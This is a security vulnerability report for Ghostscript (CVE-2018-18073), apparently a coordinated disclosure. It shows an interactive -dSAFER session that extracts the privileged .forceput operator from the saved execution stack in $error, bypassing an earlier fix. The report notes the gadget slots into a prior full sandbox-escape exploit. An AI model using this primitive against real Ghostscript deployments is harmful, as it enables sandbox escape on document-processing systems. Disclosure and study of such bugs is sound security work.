ghostscript: $error object can expose system operators in saved execution stack. CVE-2018-18073 I've found a way of getting access to .forceput even after the fix in bug 1682 , you can pull it out of the saved execution stack in $error: $ gs -dSAFER -sDEVICE=ppmraw GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13) Copyright (C) 2018 Artifex Software, Inc. All rights reserved. This software comes with NO WARRANTY: see the file PUBLIC for details. GS>{ null .setglobal } stopped clear GS>$error /estack get == [--%interp_exit-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- {prompt {(%statementedit) (r) --.systemvmfile--} --stopped-- {--pop-- --pop-- $error /errorname --get-- /undefinedfilename --eq-- {.clearerror --exit--} --if-- /handleerror --.systemvar-- --exec-- null} --if-- --cvx-- {.runexec} .execute --pop--} --%loop_continue-- {--pop--} {$error /newerror --get-- --and-- {/handleerror --.systemvar-- --exec-- --flush-- true} {false} --ifelse--} false 1 --%stopped_push-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1919 1 3 --%oparray_pop-- {-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}] Notice the .forceput in there... GS>$error /estack get 29 get == {-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--} GS>$error /estack get 29 get 6 get == --.forceput-- GS> See bug 1682 for a full exploit using .forceput, this code can just be plugged in and the full exploit will still work. This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. Found by: taviso